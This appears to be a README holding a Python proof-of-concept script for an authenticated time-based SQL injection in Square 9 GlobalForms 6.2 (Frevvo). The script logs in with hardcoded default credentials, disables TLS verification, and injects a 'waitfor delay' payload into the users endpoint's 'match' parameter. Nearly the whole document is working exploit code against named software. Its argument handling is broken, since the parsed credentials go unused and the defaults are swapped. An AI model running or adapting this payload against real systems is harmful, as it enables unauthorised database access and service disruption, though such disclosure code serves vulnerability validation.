README.md
Rendering markdown...
#!/usr/bin/python
import sys
import argparse
import datetime
import requests
from argparse import RawTextHelpFormatter
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def sqli(target, port, username, password, seconds):
sqlpayload = "')waitfor%20delay'0%3a0%3a" + str(seconds) + "'--"
s = requests.session()
login_data = {'username': 'admin@d', 'password': 'admin', 'lAction':'Login'}
m = s.post('https://' + target + ':' + port + '/frevvo/web/login', data=login_data, verify=False
)
print "Delay #1: " + str(datetime.datetime.utcnow())
r = s.get(('https://' + target + ':' + port + "/frevvo/web/tn/d/users?match=t" + sqlpayload), verify=False, cookies=s.cookies)
print "Delay #2: " + str(datetime.datetime.utcnow())
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="""
Proof of Concept script for vulnerability validation.
- Type of issue: Authenticated SQL injection
- Product: Square 9 GlobalForms 6.2
- Version: v6.2.1.27377""",formatter_class=RawTextHelpFormatter)
Required = parser.add_argument_group('Required')
#Required
Required.add_argument('-t', '--target', help='Target URL or IP Address', required=True)
Required.add_argument('-s','--seconds', help='Number of seconds to pause Frevvo', required=True)
Required.add_argument('-o','--port', help='Frevvo Web Server Port', required=True)
#Optional
parser.add_argument('-u', '--username', help='Login Username', default='admin', action="store_true", required=False)
parser.add_argument('-p', '--password', help='Login Password', default='admin@d', action="store_true", required=False)
args = parser.parse_args()
sqli(args.target,args.port,args.username,args.password,args.seconds)
if len(sys.argv) == 1:
parser.print_help()